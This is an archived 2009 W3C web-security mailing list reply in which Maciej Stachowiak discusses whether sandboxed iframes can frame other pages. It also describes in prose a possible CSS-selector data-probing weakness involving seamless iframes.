W3C home > Mailing lists > Public > public-web-security@w3.org > December 2009

Re: Seamless iframes + CSS3 selectors = bad idea

From: Maciej Stachowiak <mjs@apple.com>
Date: Sat, 05 Dec 2009 23:06:40 -0800
Cc: Ian Hickson <ian@hixie.ch>, public-web-security@w3.org
Message-id: <7454FD93-A7F3-4D2C-AFD4-6B5CC8FC47CA@apple.com>
To: "sird@rckc.at" <sird@rckc.at>

On Dec 5, 2009, at 10:58 PM, sird@rckc.at wrote:

> iirc sandboxed iframes cant frame.
My reading of the spec (confirmed by Hixie) is that sandboxed iframes  
can frame - perhaps they should not be able to.
> in any case sandbox iframes are a joke unless you use data URIs..  
> that should be cross origin anyway
Not setting the allow-same-origin flag makes them about as restricted  
as using a data: URI.

  - Maciej

>> On Dec 6, 2009 2:55 PM, "Maciej Stachowiak" <mjs@apple.com> wrote:
>> On Dec 5, 2009, at 10:27 PM, Maciej Stachowiak wrote: > > I think  
>> the attack is that you can injec...
>> OK, I thought of a possible real vulnerability. A trusted host page  
>> on the site wants to embed some untrusted user-generated content  
>> with the ability to modify it, so it embeds it, hosted from its own  
>> server, using <iframe sandbox="allow-same-origin">. This should  
>> prevent scripting and plugins, so in theory it seems safe. But the  
>> untrusted content could embed a further iframe with the seamless  
>> flag, embedding an arbitrary document from the hosting service. It  
>> can then use CSS selectors to probe for data in that document.
>> Regards,
>> Maciej
Received on Sunday, 6 December 2009 07:07:14 GMT

This archive was generated by hypermail 2.2.0+W3C-0.50 : Sunday, 19 December 2010 00:16:01 GMT